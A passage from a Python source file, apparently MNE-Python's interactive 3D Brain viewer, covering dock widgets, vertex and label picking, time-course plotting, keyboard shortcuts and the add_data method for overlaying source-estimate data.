callback=self.callbacks["renderer"], layout=layout, ) self.callbacks["renderer"].widget = \ self.widgets["renderer"] # Use 'lh' as a reference for orientation for 'both' if self._hemi == 'both': hemis_ref = ['lh'] else: hemis_ref = self._hemis orientation_data = [None] * len(rends) for hemi in hemis_ref: for ri, ci, v in self._iter_views(hemi): idx = self._renderer._loc_to_index((ri, ci)) if v == 'flat': _data = None else: _data = dict(default=v, hemi=hemi, row=ri, col=ci) orientation_data[idx] = _data self.callbacks["orientation"] = ShowView( brain=self, data=orientation_data, ) self.widgets["orientation"] = self._renderer._dock_add_combo_box( name=None, value=self.orientation[0], rng=self.orientation, callback=self.callbacks["orientation"], layout=layout, ) def _configure_dock_colormap_widget(self, name): layout = self._renderer._dock_add_group_box(name) self._renderer._dock_add_label( value="min / mid / max", align=True, layout=layout, ) up = UpdateLUT(brain=self) for key in self.keys: hlayout = self._renderer._dock_add_layout(vertical=False) rng = _get_range(self) self.callbacks[key] = lambda value, key=key: up(**{key: value}) self.widgets[key] = self._renderer._dock_add_slider( name=None, value=self._data[key], rng=rng, callback=self.callbacks[key], double=True, layout=hlayout, ) self.widgets[f"entry_{key}"] = self._renderer._dock_add_spin_box( name=None, value=self._data[key], callback=self.callbacks[key], rng=rng, layout=hlayout, ) up.widgets[key] = [self.widgets[key], self.widgets[f"entry_{key}"]] self._renderer._layout_add_widget(layout, hlayout) # reset / minus / plus hlayout = self._renderer._dock_add_layout(vertical=False) self._renderer._dock_add_label( value="Rescale", align=True, layout=hlayout, ) self.widgets["reset"] = self._renderer._dock_add_button( name="↺", callback=self.restore_user_scaling, layout=hlayout, style='toolbutton', ) for key, char, val in (("fminus", "➖", 1.2 ** -0.25), ("fplus", "➕", 1.2 ** 0.25)): self.callbacks[key] = UpdateColorbarScale( brain=self, factor=val, ) self.widgets[key] = self._renderer._dock_add_button( name=char, callback=self.callbacks[key], layout=hlayout, style='toolbutton', ) self._renderer._layout_add_widget(layout, hlayout) # register colorbar slider representations widgets = {key: self.widgets[key] for key in self.keys} for name in ("fmin", "fmid", "fmax", "fminus", "fplus"): self.callbacks[name].widgets = widgets def _configure_dock_trace_widget(self, name): if not self.show_traces: return # do not show trace mode for volumes if (self._data.get('src', None) is not None and self._data['src'].kind == 'volume'): self._configure_vertex_time_course() return layout = self._renderer._dock_add_group_box(name) # setup candidate annots def _set_annot(annot): self.clear_glyphs() self.remove_labels() self.remove_annotations() self.annot = annot if annot == 'None': self.traces_mode = 'vertex' self._configure_vertex_time_course() else: self.traces_mode = 'label' self._configure_label_time_course() self._renderer._update() # setup label extraction parameters def _set_label_mode(mode): if self.traces_mode != 'label': return glyphs = copy.deepcopy(self.picked_patches) self.label_extract_mode = mode self.clear_glyphs() for hemi in self._hemis: for label_id in glyphs[hemi]: label = self._annotation_labels[hemi][label_id] vertex_id = label.vertices[0] self._add_label_glyph(hemi, None, vertex_id) self.mpl_canvas.axes.relim() self.mpl_canvas.axes.autoscale_view() self.mpl_canvas.update_plot() self._renderer._update() from ...source_estimate import _get_allowed_label_modes from ...label import _read_annot_cands dir_name = op.join(self._subjects_dir, self._subject_id, 'label') cands = _read_annot_cands(dir_name, raise_error=False) cands = cands + ['None'] self.annot = cands[0] stc = self._data["stc"] modes = _get_allowed_label_modes(stc) if self._data["src"] is None: modes = [m for m in modes if m not in self.default_label_extract_modes["src"]] self.label_extract_mode = modes[-1] if self.traces_mode == 'vertex': _set_annot('None') else: _set_annot(self.annot) self.widgets["annotation"] = self._renderer._dock_add_combo_box( name="Annotation", value=self.annot, rng=cands, callback=_set_annot, layout=layout, ) self.widgets["extract_mode"] = self._renderer._dock_add_combo_box( name="Extract mode", value=self.label_extract_mode, rng=modes, callback=_set_label_mode, layout=layout, ) def _configure_dock(self): self._renderer._dock_initialize() self._configure_dock_playback_widget(name="Playback") self._configure_dock_orientation_widget(name="Orientation") self._configure_dock_colormap_widget(name="Color Limits") self._configure_dock_trace_widget(name="Trace") # Smoothing widget self.callbacks["smoothing"] = SmartCallBack( callback=self.set_data_smoothing, ) self.widgets["smoothing"] = self._renderer._dock_add_spin_box( name="Smoothing", value=self._data['smoothing_steps'], rng=self.default_smoothing_range, callback=self.callbacks["smoothing"], double=False ) self.callbacks["smoothing"].widget = \ self.widgets["smoothing"] self._renderer._dock_finalize() def _configure_playback(self): self._renderer._playback_initialize( func=self._play, timeout=self.refresh_rate_ms, value=self._data['time_idx'], rng=[0, len(self._data['time']) - 1], time_widget=self.widgets["time"], play_widget=self.widgets["play"], ) def _configure_mplcanvas(self): # Get the fractional components for the brain and mpl self.mpl_canvas = self._renderer._window_get_mplcanvas( brain=self, interactor_fraction=self.interactor_fraction, show_traces=self.show_traces, separate_canvas=self.separate_canvas ) xlim = [np.min(self._data['time']), np.max(self._data['time'])] with warnings.catch_warnings(): warnings.filterwarnings("ignore", category=UserWarning) self.mpl_canvas.axes.set(xlim=xlim) if not self.separate_canvas: self._renderer._window_adjust_mplcanvas_layout() self.mpl_canvas.set_color( bg_color=self._bg_color, fg_color=self._fg_color, ) def _configure_vertex_time_course(self): if not self.show_traces: return if self.mpl_canvas is None: self._configure_mplcanvas() else: self.clear_glyphs() # plot RMS of the activation y = np.concatenate(list(v[0] for v in self.act_data_smooth.values() if v[0] is not None)) rms = np.linalg.norm(y, axis=0) / np.sqrt(len(y)) del y self.rms, = self.mpl_canvas.axes.plot( self._data['time'], rms, lw=3, label='RMS', zorder=3, color=self._fg_color, alpha=0.5, ls=':') # now plot the time line self.plot_time_line(update=False) # then the picked points for idx, hemi in enumerate(['lh', 'rh', 'vol']): act_data = self.act_data_smooth.get(hemi, [None])[0] if act_data is None: continue hemi_data = self._data[hemi] vertices = hemi_data['vertices'] # simulate a picked renderer if self._hemi in ('both', 'rh') or hemi == 'vol': idx = 0 self.picked_renderer = self._renderer._all_renderers[idx] # initialize the default point if self._data['initial_time'] is not None: # pick at that time use_data = act_data[ :, [np.round(self._data['time_idx']).astype(int)]] else: use_data = act_data ind = np.unravel_index(np.argmax(np.abs(use_data), axis=None), use_data.shape) if hemi == 'vol': mesh = hemi_data['grid'] else: mesh = self._layered_meshes[hemi]._polydata vertex_id = vertices[ind[0]] self._add_vertex_glyph(hemi, mesh, vertex_id, update=False) def _configure_picking(self): # get data for each hemi from scipy import sparse for idx, hemi in enumerate(['vol', 'lh', 'rh']): hemi_data = self._data.get(hemi) if hemi_data is not None: act_data = hemi_data['array'] if act_data.ndim == 3: act_data = np.linalg.norm(act_data, axis=1) smooth_mat = hemi_data.get('smooth_mat') vertices = hemi_data['vertices'] if hemi == 'vol': assert smooth_mat is None smooth_mat = sparse.csr_matrix( (np.ones(len(vertices)), (vertices, np.arange(len(vertices))))) self.act_data_smooth[hemi] = (act_data, smooth_mat) self._renderer._update_picking_callback( self._on_mouse_move, self._on_button_press, self._on_button_release, self._on_pick ) def _configure_tool_bar(self): self._renderer._tool_bar_load_icons() self._renderer._tool_bar_set_theme(self.theme) self._renderer._tool_bar_initialize(name="Toolbar") self._renderer._tool_bar_add_file_button( name="screenshot", desc="Take a screenshot", func=self.save_image, ) self._renderer._tool_bar_add_file_button( name="movie", desc="Save movie...", func=lambda filename: self.save_movie( filename=filename, time_dilation=(1. / self.playback_speed)), shortcut="ctrl+shift+s", ) self._renderer._tool_bar_add_button( name="visibility", desc="Toggle Controls", func=self.toggle_interface, icon_name="visibility_on" ) self.widgets["play"] = self._renderer._tool_bar_add_play_button( name="play", desc="Play/Pause", func=self.toggle_playback, shortcut=" ", ) self._renderer._tool_bar_add_button( name="reset", desc="Reset", func=self.reset, ) self._renderer._tool_bar_add_button( name="scale", desc="Auto-Scale", func=self.apply_auto_scaling, ) self._renderer._tool_bar_add_button( name="clear", desc="Clear traces", func=self.clear_glyphs, ) self._renderer._tool_bar_add_spacer() self._renderer._tool_bar_add_button( name="help", desc="Help", func=self.help, shortcut="?", ) def _shift_time(self, op): self.callbacks["time"]( value=(op(self._current_time, self.playback_speed)), time_as_index=False, update_widget=True, ) def _rotate_azimuth(self, value): azimuth = (self._renderer.figure._azimuth + value) % 360 self._renderer.set_camera(azimuth=azimuth, reset_camera=False) def _rotate_elevation(self, value): elevation = np.clip( self._renderer.figure._elevation + value, self._elevation_rng[0], self._elevation_rng[1], ) self._renderer.set_camera(elevation=elevation, reset_camera=False) def _configure_shortcuts(self): # First, we remove the default bindings: self._clear_callbacks() # Then, we add our own: self.plotter.add_key_event("i", self.toggle_interface) self.plotter.add_key_event("s", self.apply_auto_scaling) self.plotter.add_key_event("r", self.restore_user_scaling) self.plotter.add_key_event("c", self.clear_glyphs) self.plotter.add_key_event("n", partial(self._shift_time, op=lambda x, y: x + y)) self.plotter.add_key_event("b", partial(self._shift_time, op=lambda x, y: x - y)) for key, func, sign in (("Left", self._rotate_azimuth, 1), ("Right", self._rotate_azimuth, -1), ("Up", self._rotate_elevation, 1), ("Down", self._rotate_elevation, -1)): self.plotter.add_key_event(key, partial(func, sign * _ARROW_MOVE)) def _configure_menu(self): self._renderer._menu_initialize() self._renderer._menu_add_submenu( name="help", desc="Help", ) self._renderer._menu_add_button( menu_name="help", name="help", desc="Show MNE key bindings\t?", func=self.help, ) def _configure_status_bar(self): self._renderer._status_bar_initialize() self.status_msg = self._renderer._status_bar_add_label( self.default_status_bar_msg, stretch=1) self.status_progress = self._renderer._status_bar_add_progress_bar() if self.status_progress is not None: self.status_progress.hide() def _on_mouse_move(self, vtk_picker, event): if self._mouse_no_mvt: self._mouse_no_mvt -= 1 def _on_button_press(self, vtk_picker, event): self._mouse_no_mvt = 2 def _on_button_release(self, vtk_picker, event): if self._mouse_no_mvt > 0: x, y = vtk_picker.GetEventPosition() # programmatically detect the picked renderer try: # pyvista<0.30.0 self.picked_renderer = \ self.plotter.iren.FindPokedRenderer(x, y) except AttributeError: # pyvista>=0.30.0 self.picked_renderer = \ self.plotter.iren.interactor.FindPokedRenderer(x, y) # trigger the pick self.plotter.picker.Pick(x, y, 0, self.picked_renderer) self._mouse_no_mvt = 0 def _on_pick(self, vtk_picker, event): if not self.show_traces: return # vtk_picker is a vtkCellPicker cell_id = vtk_picker.GetCellId() mesh = vtk_picker.GetDataSet() if mesh is None or cell_id == -1 or not self._mouse_no_mvt: return # don't pick # 1) Check to see if there are any spheres along the ray if len(self._spheres): collection = vtk_picker.GetProp3Ds() found_sphere = None for ii in range(collection.GetNumberOfItems()): actor = collection.GetItemAsObject(ii) for sphere in self._spheres: if any(a is actor for a in sphere._actors): found_sphere = sphere break if found_sphere is not None: break if found_sphere is not None: assert found_sphere._is_glyph mesh = found_sphere # 2) Remove sphere if it's what we have if hasattr(mesh, "_is_glyph"): self._remove_vertex_glyph(mesh) return # 3) Otherwise, pick the objects in the scene try: hemi = mesh._hemi except AttributeError: # volume hemi = 'vol' else: assert hemi in ('lh', 'rh') if self.act_data_smooth[hemi][0] is None: # no data to add for hemi return pos = np.array(vtk_picker.GetPickPosition()) if hemi == 'vol': # VTK will give us the point closest to the viewer in the vol. # We want to pick the point with the maximum value along the # camera-to-click array, which fortunately we can get "just" # by inspecting the points that are sufficiently close to the # ray. grid = mesh = self._data[hemi]['grid'] vertices = self._data[hemi]['vertices'] coords = self._data[hemi]['grid_coords'][vertices] scalars = _cell_data(grid)['values'][vertices] spacing = np.array(grid.GetSpacing()) max_dist = np.linalg.norm(spacing) / 2. origin = vtk_picker.GetRenderer().GetActiveCamera().GetPosition() ori = pos - origin ori /= np.linalg.norm(ori) # the magic formula: distance from a ray to a given point dists = np.linalg.norm(np.cross(ori, coords - pos), axis=1) assert dists.shape == (len(coords),) mask = dists <= max_dist idx = np.where(mask)[0] if len(idx) == 0: return # weird point on edge of volume? # useful for debugging the ray by mapping it into the volume: # dists = dists - dists.min() # dists = (1. - dists / dists.max()) * self._cmap_range[1] # _cell_data(grid)['values'][vertices] = dists * mask idx = idx[np.argmax(np.abs(scalars[idx]))] vertex_id = vertices[idx] # Naive way: convert pos directly to idx; i.e., apply mri_src_t # shape = self._data[hemi]['grid_shape'] # taking into account the cell vs point difference (spacing/2) # shift = np.array(grid.GetOrigin()) + spacing / 2. # ijk = np.round((pos - shift) / spacing).astype(int) # vertex_id = np.ravel_multi_index(ijk, shape, order='F') else: vtk_cell = mesh.GetCell(cell_id) cell = [vtk_cell.GetPointId(point_id) for point_id in range(vtk_cell.GetNumberOfPoints())] vertices = mesh.points[cell] idx = np.argmin(abs(vertices - pos), axis=0) vertex_id = cell[idx[0]] if self.traces_mode == 'label': self._add_label_glyph(hemi, mesh, vertex_id) else: self._add_vertex_glyph(hemi, mesh, vertex_id) def _add_label_glyph(self, hemi, mesh, vertex_id): if hemi == 'vol': return label_id = self._vertex_to_label_id[hemi][vertex_id] label = self._annotation_labels[hemi][label_id] # remove the patch if already picked if label_id in self.picked_patches[hemi]: self._remove_label_glyph(hemi, label_id) return if hemi == label.hemi: self.add_label(label, borders=True, reset_camera=False) self.picked_patches[hemi].append(label_id) def _remove_label_glyph(self, hemi, label_id): label = self._annotation_labels[hemi][label_id] label._line.remove() self.color_cycle.restore(label._color) self.mpl_canvas.update_plot() self._layered_meshes[hemi].remove_overlay(label.name) self.picked_patches[hemi].remove(label_id) def _add_vertex_glyph(self, hemi, mesh, vertex_id, update=True): if vertex_id in self.picked_points[hemi]: return # skip if the wrong hemi is selected if self.act_data_smooth[hemi][0] is None: return color = next(self.color_cycle) line = self.plot_time_course(hemi, vertex_id, color, update=update) if hemi == 'vol': ijk = np.unravel_index( vertex_id, np.array(mesh.GetDimensions()) - 1, order='F') # should just be GetCentroid(center), but apparently it's VTK9+: # center = np.empty(3) # voxel.GetCentroid(center) voxel = mesh.GetCell(*ijk) pts = voxel.GetPoints() n_pts = pts.GetNumberOfPoints() center = np.empty((n_pts, 3)) for ii in range(pts.GetNumberOfPoints()): pts.GetPoint(ii, center[ii]) center = np.mean(center, axis=0) else: center = mesh.GetPoints().GetPoint(vertex_id) del mesh # from the picked renderer to the subplot coords try: lst = self._renderer._all_renderers._renderers except AttributeError: lst = self._renderer._all_renderers rindex = lst.index(self.picked_renderer) row, col = self._renderer._index_to_loc(rindex) actors = list() spheres = list() for _ in self._iter_views(hemi): # Using _sphere() instead of renderer.sphere() for 2 reasons: # 1) renderer.sphere() fails on Windows in a scenario where a lot # of picking requests are done in a short span of time (could be # mitigated with synchronization/delay?) # 2) the glyph filter is used in renderer.sphere() but only one # sphere is required in this function. actor, sphere = self._renderer._sphere( center=np.array(center), color=color, radius=4.0, ) actors.append(actor) spheres.append(sphere) # add metadata for picking for sphere in spheres: sphere._is_glyph = True sphere._hemi = hemi sphere._line = line sphere._actors = actors sphere._color = color sphere._vertex_id = vertex_id self.picked_points[hemi].append(vertex_id) self._spheres.extend(spheres) self.pick_table[vertex_id] = spheres return sphere def _remove_vertex_glyph(self, mesh, render=True): vertex_id = mesh._vertex_id if vertex_id not in self.pick_table: return hemi = mesh._hemi color = mesh._color spheres = self.pick_table[vertex_id] spheres[0]._line.remove() self.mpl_canvas.update_plot() self.picked_points[hemi].remove(vertex_id) with warnings.catch_warnings(record=True): # We intentionally ignore these in case we have traversed the # entire color cycle warnings.simplefilter('ignore') self.color_cycle.restore(color) for sphere in spheres: # remove all actors self.plotter.remove_actor(sphere._actors, render=render) sphere._actors = None self._spheres.pop(self._spheres.index(sphere)) self.pick_table.pop(vertex_id) def clear_glyphs(self): """Clear the picking glyphs.""" if not self.time_viewer: return for sphere in list(self._spheres): # will remove itself, so copy self._remove_vertex_glyph(sphere, render=False) assert sum(len(v) for v in self.picked_points.values()) == 0 assert len(self.pick_table) == 0 assert len(self._spheres) == 0 for hemi in self._hemis: for label_id in list(self.picked_patches[hemi]): self._remove_label_glyph(hemi, label_id) assert sum(len(v) for v in self.picked_patches.values()) == 0 if self.rms is not None: self.rms.remove() self.rms = None self._renderer._update() def plot_time_course(self, hemi, vertex_id, color, update=True): """Plot the vertex time course. Parameters ---------- hemi : str The hemisphere id of the vertex. vertex_id : int The vertex identifier in the mesh. color : matplotlib color The color of the time course. update : bool Force an update of the plot. Defaults to True. Returns ------- line : matplotlib object The time line object. """ if self.mpl_canvas is None: return time = self._data['time'].copy() # avoid circular ref mni = None if hemi == 'vol': hemi_str = 'V' xfm = read_talxfm( self._subject_id, self._subjects_dir) if self._units == 'mm': xfm['trans'][:3, 3] *= 1000. ijk = np.unravel_index( vertex_id, self._data[hemi]['grid_shape'], order='F') src_mri_t = self._data[hemi]['grid_src_mri_t'] mni = apply_trans(np.dot(xfm['trans'], src_mri_t), ijk) else: hemi_str = 'L' if hemi == 'lh' else 'R' try: mni = vertex_to_mni( vertices=vertex_id, hemis=0 if hemi == 'lh' else 1, subject=self._subject_id, subjects_dir=self._subjects_dir ) except Exception: mni = None if mni is not None: mni = ' MNI: ' + ', '.join('%5.1f' % m for m in mni) else: mni = '' label = "{}:{}{}".format(hemi_str, str(vertex_id).ljust(6), mni) act_data, smooth = self.act_data_smooth[hemi] if smooth is not None: act_data = smooth[vertex_id].dot(act_data)[0] else: act_data = act_data[vertex_id].copy() line = self.mpl_canvas.plot( time, act_data, label=label, lw=1., color=color, zorder=4, update=update, ) return line def plot_time_line(self, update=True): """Add the time line to the MPL widget. Parameters ---------- update : bool Force an update of the plot. Defaults to True. """ if self.mpl_canvas is None: return if isinstance(self.show_traces, bool) and self.show_traces: # add time information current_time = self._current_time if not hasattr(self, "time_line"): self.time_line = self.mpl_canvas.plot_time_line( x=current_time, label='time', color=self._fg_color, lw=1, update=update, ) self.time_line.set_xdata(current_time) if update: self.mpl_canvas.update_plot() def _configure_help(self): pairs = [ ('?', 'Display help window'), ('i', 'Toggle interface'), ('s', 'Apply auto-scaling'), ('r', 'Restore original clim'), ('c', 'Clear all traces'), ('n', 'Shift the time forward by the playback speed'), ('b', 'Shift the time backward by the playback speed'), ('Space', 'Start/Pause playback'), ('Up', 'Decrease camera elevation angle'), ('Down', 'Increase camera elevation angle'), ('Left', 'Decrease camera azimuth angle'), ('Right', 'Increase camera azimuth angle'), ] text1, text2 = zip(*pairs) text1 = '\n'.join(text1) text2 = '\n'.join(text2) self.help_canvas = self._renderer._window_get_simple_canvas( width=5, height=2, dpi=80) _show_help_fig( col1=text1, col2=text2, fig_help=self.help_canvas.fig, ax=self.help_canvas.axes, show=False, ) def help(self): """Display the help window.""" self.help_canvas.show() def _clear_callbacks(self): if not hasattr(self, 'callbacks'): return for callback in self.callbacks.values(): if callback is not None: for key in ('plotter', 'brain', 'callback', 'widget', 'widgets'): setattr(callback, key, None) self.callbacks.clear() # Remove the default key binding if getattr(self, "iren", None) is not None: self.plotter.iren.clear_key_event_callbacks() def _clear_widgets(self): if not hasattr(self, 'widgets'): return for widget in self.widgets.values(): if widget is not None: for key in ('triggered', 'valueChanged'): setattr(widget, key, None) self.widgets.clear() @property def interaction(self): """The interaction style.""" return self._interaction @interaction.setter def interaction(self, interaction): """Set the interaction style.""" _validate_type(interaction, str, 'interaction') _check_option('interaction', interaction, ('trackball', 'terrain')) for _ in self._iter_views('vol'): # will traverse all self._renderer.set_interaction(interaction) def _cortex_colormap(self, cortex): """Return the colormap corresponding to the cortex.""" from .._3d import _get_cmap from matplotlib.colors import ListedColormap colormap_map = dict(classic=dict(colormap="Greys", vmin=-1, vmax=2), high_contrast=dict(colormap="Greys", vmin=-.1, vmax=1.3), low_contrast=dict(colormap="Greys", vmin=-5, vmax=5), bone=dict(colormap="bone_r", vmin=-.2, vmax=2), ) _validate_type(cortex, (str, dict, list, tuple), 'cortex') if isinstance(cortex, str): if cortex in colormap_map: cortex = colormap_map[cortex] else: cortex = [cortex] * 2 if isinstance(cortex, (list, tuple)): _check_option('len(cortex)', len(cortex), (2, 3), extra='when cortex is a list or tuple') if len(cortex) == 3: cortex = [cortex] * 2 cortex = list(cortex) for ci, c in enumerate(cortex): cortex[ci] = _to_rgb(c, name='cortex') cortex = dict( colormap=ListedColormap(cortex, name='custom binary'), vmin=0, vmax=1) cortex = dict( vmin=float(cortex['vmin']), vmax=float(cortex['vmax']), colormap=_get_cmap(cortex['colormap']), ) return cortex def _remove(self, item, render=False): """Remove actors from the rendered scene.""" if item in self._actors: logger.debug( f'Removing {len(self._actors[item])} {item} actor(s)') for actor in self._actors[item]: self._renderer.plotter.remove_actor(actor) self._actors.pop(item) # remove actor list if render: self._renderer._update() def _add_actor(self, item, actor): """Add an actor to the internal register.""" if item in self._actors: # allows adding more than one self._actors[item].append(actor) else: self._actors[item] = [actor] @verbose def add_data(self, array, fmin=None, fmid=None, fmax=None, thresh=None, center=None, transparent=False, colormap="auto", alpha=1, vertices=None, smoothing_steps=None, time=None, time_label="auto", colorbar=True, hemi=None, remove_existing=None, time_label_size=None, initial_time=None, scale_factor=None, vector_alpha=None, clim=None, src=None, volume_options=0.4, colorbar_kwargs=None, verbose=None): """Display data from a numpy array on the surface or volume. This provides a similar interface to :meth:`surfer.Brain.add_overlay`, but it displays it with a single colormap. It offers more flexibility over the colormap, and provides a way to display four-dimensional data (i.e., a timecourse) or five-dimensional data (i.e., a vector-valued timecourse). .. note:: ``fmin`` sets the low end of the colormap, and is separate from thresh (this is a different convention from :meth:`surfer.Brain.add_overlay`). Parameters ---------- array : numpy array, shape (n_vertices[, 3][, n_times]) Data array. For the data to be understood as vector-valued (3 values per vertex corresponding to X/Y/Z surface RAS), then ``array`` must be have all 3 dimensions. If vectors with no time dimension are desired, consider using a singleton (e.g., ``np.newaxis``) to create a "time" dimension and pass ``time_label=None`` (vector values are not supported). %(fmin_fmid_fmax)s %(thresh)s %(center)s %(transparent)s colormap : str, list of color, or array Name of matplotlib colormap to use, a list of matplotlib colors, or a custom look up table (an n x 4 array coded with RBGA values between 0 and 255), the default "auto" chooses a default divergent colormap, if "center" is given (currently "icefire"), otherwise a default sequential colormap (currently "rocket"). alpha : float in [0, 1] Alpha level to control opacity of the overlay. vertices : numpy array Vertices for which the data is defined (needed if ``len(data) < nvtx``). smoothing_steps : int or None Number of smoothing steps (smoothing is used if len(data) < nvtx) The value 'nearest' can be used too. None (default) will use as many as necessary to fill the surface. time : numpy array Time points in the data array (if data is 2D or 3D). %(time_label)s colorbar : bool Whether to add a colorbar to the figure. Can also be a tuple to give the (row, col) index of where to put the colorbar. hemi : str | None If None, it is assumed to belong to the hemisphere being shown. If two hemispheres are being shown, an error will be thrown. remove_existing : bool Not supported yet. Remove surface added by previous "add_data" call. Useful for conserving memory when displaying different data in a loop. time_label_size : int Font size of the time label (default 14). initial_time : float | None Time initially shown in the plot. ``None`` to use the first time sample (default). scale_factor : float | None (default) The scale factor to use when displaying glyphs for vector-valued data. vector_alpha : float | None Alpha level to control opacity of the arrows. Only used for vector-valued data. If None (default), ``alpha`` is used. clim : dict Original clim arguments. %(src_volume_options)s colorbar_kwargs : dict | None Options to pass to :meth:`pyvista.Plotter.add_scalar_bar` (e.g., ``dict(title_font_size=10)``). %(verbose)s Notes ----- If the data is defined for a subset of vertices (specified by the "vertices" parameter), a smoothing method is used to interpolate the data onto the high resolution surface. If the data is defined for subsampled version of the surface, smoothing_steps can be set to None, in which case only as many smoothing steps are applied until the whole surface is filled with non-zeros. Due to a VTK alpha rendering bug, ``vector_alpha`` is clamped to be strictly < 1. """ _validate_type(transparent, bool, 'transparent') _validate_type(vector_alpha, ('numeric', None), 'vector_alpha') _validate_type(scale_factor, ('numeric', None), 'scale_factor') # those parameters are not supported yet, only None is allowed _check_option('thresh', thresh, [None]) _check_option('remove_existing', remove_existing, [None]) _validate_type(time_label_size, (None, 'numeric'), 'time_label_size') if time_label_size is not None: time_label_size = float(time_label_size) if time_label_size < 0: raise ValueError('time_label_size must be positive, got ' f'{time_label_size}') hemi = self._check_hemi(hemi, extras=['vol']) stc, array, vertices = self._check_stc(hemi, array, vertices) array = np.asarray(array) vector_alpha = alpha if vector_alpha is None else vector_alpha self._data['vector_alpha'] = vector_alpha self._data['scale_factor'] = scale_factor # Create time array and add label if > 1D if array.ndim <= 1: time_idx = 0 else: # check time array if time is None: time = np.arange(array.shape[-1]) else: time = np.asarray(time) if time.shape != (array.shape[-1],): raise ValueError('time has shape %s, but need shape %s ' '(array.shape[-1])' % (time.shape, (array.shape[-1],))) self._data["time"] = time if self._n_times is None: self._times = time elif len(time) != self._n_times: raise ValueError("New n_times is different from previous " "n_times") elif not np.array_equal(time, self._times): raise ValueError("Not all time values are consistent with " "previously set times.") # initial time if initial_time is None: time_idx = 0 else: time_idx = self._to_time_index(initial_time) # time label time_label, _ = _handle_time(time_label, 's', time) y_txt = 0.05 + 0.1 * bool(colorbar) if array.ndim == 3: if array.shape[1] != 3: raise ValueError('If array has 3 dimensions, array.shape[1] ' 'must equal 3, got %s' % (array.shape[1],)) fmin, fmid, fmax = _update_limits( fmin, fmid, fmax, center, array ) if colormap == 'auto': colormap = 'mne' if center is not None else 'hot' if smoothing_steps is None: smoothing_steps = 7 elif smoothing_steps == 'nearest': smoothing_steps = -1 elif isinstance(smoothing_steps, int): if smoothing_steps < 0: raise ValueError('Expected value of `smoothing_steps` is' ' positive but {} was given.'.format( smoothing_steps)) else: raise TypeError('Expected type of `smoothing_steps` is int or' ' NoneType but {} was given.'.format( type(smoothing_steps))) self._data['stc'] = stc self._data['src'] = src self._data['smoothing_steps'] = smoothing_steps self._data['clim'] = clim self._data['time'] = time self._data['initial_time'] = initial_time self._data['time_label'] = time_label self._data['initial_time_idx'] = time_idx self._data['time_idx'] = time_idx self._data['transparent'] = transparent # data specific for a hemi self._data[hemi] = dict() self._data[hemi]['glyph_dataset'] = None self._data[hemi]['glyph_mapper'] = None self._data[hemi]['glyph_actor'] = None self._data[hemi]['array'] = array self._data[hemi]['vertices'] = vertices self._data['alpha'] = alpha self._data['colormap'] = colormap self._data['center'] = center self._data['fmin'] = fmin self._data['fmid'] = fmid self._data['fmax'] = fmax self.update_lut() # 1) add the surfaces first actor = None for _ in self._iter_views(hemi): if hemi in ('lh', 'rh'): actor = self._layered_meshes[hemi]._actor else: src_vol = src[2:] if src.kind == 'mixed' else src actor, _ = self._add_volume_data(hemi, src_vol, volume_options) assert actor is not None # should have added one self._add_actor('data', actor) # 2) update time and smoothing properties # set_data_smoothing calls "set_time_point" for us, which will set # _current_time self.set_time_interpolation(self.time_interpolation) self.set_data_smoothing(self._data['smoothing_steps']) # 3) add the other actors if colorbar is True: # bottom left by default colorbar = (self._subplot_shape[0] - 1, 0) for ri, ci, v in self._iter_views(hemi): # Add the time label to the bottommost view do = (ri, ci) == colorbar if not self._time_label_added and time_label is not None and do: time_actor = self._renderer.text2d( x_window=0.95, y_window=y_txt, color=self._fg_color, size=time_label_size, text=time_label(self._current_time), justification='right' ) self._data['time_actor'] = time_actor self._time_label_added = True if colorbar and self._scalar_bar is None and do: kwargs = dict(source=actor, n_labels=8, color=self._fg_color, bgcolor=self._brain_color[:3]) kwargs.update(colorbar_kwargs or {}) self._scalar_bar = self._renderer.scalarbar(**kwargs) self._renderer.set_camera( update=False, reset_camera=False, **views_dicts[hemi][v]) # 4) update the scalar bar and opacity self.update_lut(alpha=alpha) def remove_data(self): """Remove rendered data from the mesh.""" self._remove('data', render=True) def _iter_views(self, hemi): """Iterate over rows and columns that need to be added to.""" hemi_dict = dict(lh=[0], rh=[0], vol=[0]) if self._hemi == 'split': hemi_dict.update(rh=[1], vol=[0, 1]) for vi, view in enumerate(self._views): view_dict = dict(lh=[vi], rh=[vi], vol=[vi]) if self._hemi == 'split': view_dict.update(vol=[vi, vi]) if self._view_layout == 'vertical': rows, cols = view_dict, hemi_dict # views are rows, hemis cols else: rows, cols = hemi_dict, view_dict # hemis are rows, views cols for ri, ci in zip(rows[hemi], cols[hemi]): self._renderer.subplot(ri, ci) yield ri, ci, view def remove_labels(self): """Remove all the ROI labels from the image.""" for hemi in self._hemis: mesh = self._layered_meshes[hemi] for label in self._labels[hemi]: mesh.remove_overlay(label.name) self._labels[hemi].clear() self._renderer._update() def remove_annotations(self): """Remove all annotations from the image.""" for hemi in self._hemis: mesh = self._layered_meshes[hemi] mesh.remove_overlay(self._annots[hemi]) self._annots[hemi].clear() self._renderer._update() def _add_volume_data(self, hemi, src, volume_options): from ..backends._pyvista import _hide_testing_actor _validate_type(src, SourceSpaces, 'src') _check_option('src.kind', src.kind, ('volume',)) _validate_type( volume_options, (dict, 'numeric', None), 'volume_options') assert hemi == 'vol' if not isinstance(volume_options, dict): volume_options = dict( resolution=float(volume_options) if volume_options is not None else None) volume_options = _handle_default('volume_options', volume_options) allowed_types = ( ['resolution', (None, 'numeric')], ['blending', (str,)], ['alpha', ('numeric', None)], ['surface_alpha', (None, 'numeric')], ['silhouette_alpha', (None, 'numeric')], ['silhouette_linewidth', ('numeric',)], ) for key, types in allowed_types: _validate_type(volume_options[key], types, f'volume_options[{repr(key)}]') extra_keys = set(volume_options) - set(a[0] for a in allowed_types) if len(extra_keys): raise ValueError( f'volume_options got unknown keys {sorted(extra_keys)}') blending = _check_option('volume_options["blending"]', volume_options['blending'], ('composite', 'mip')) alpha = volume_options['alpha'] if alpha is None: alpha = 0.4 if self._data[hemi]['array'].ndim == 3 else 1. alpha = np.clip(float(alpha), 0., 1.) resolution = volume_options['resolution'] surface_alpha = volume_options['surface_alpha'] if surface_alpha is None: surface_alpha = min(alpha / 2., 0.1) silhouette_alpha = volume_options['silhouette_alpha'] if silhouette_alpha is None: silhouette_alpha = surface_alpha / 4. silhouette_linewidth = volume_options['silhouette_linewidth'] del volume_options volume_pos = self._data[hemi].get('grid_volume_pos') volume_neg = self._data[hemi].get('grid_volume_neg') center = self._data['center'] if volume_pos is None: xyz = np.meshgrid( *[np.arange(s) for s in src[0]['shape']], indexing='ij') dimensions = np.array(src[0]['shape'], int) mult = 1000 if self._units == 'mm' else 1 src_mri_t = 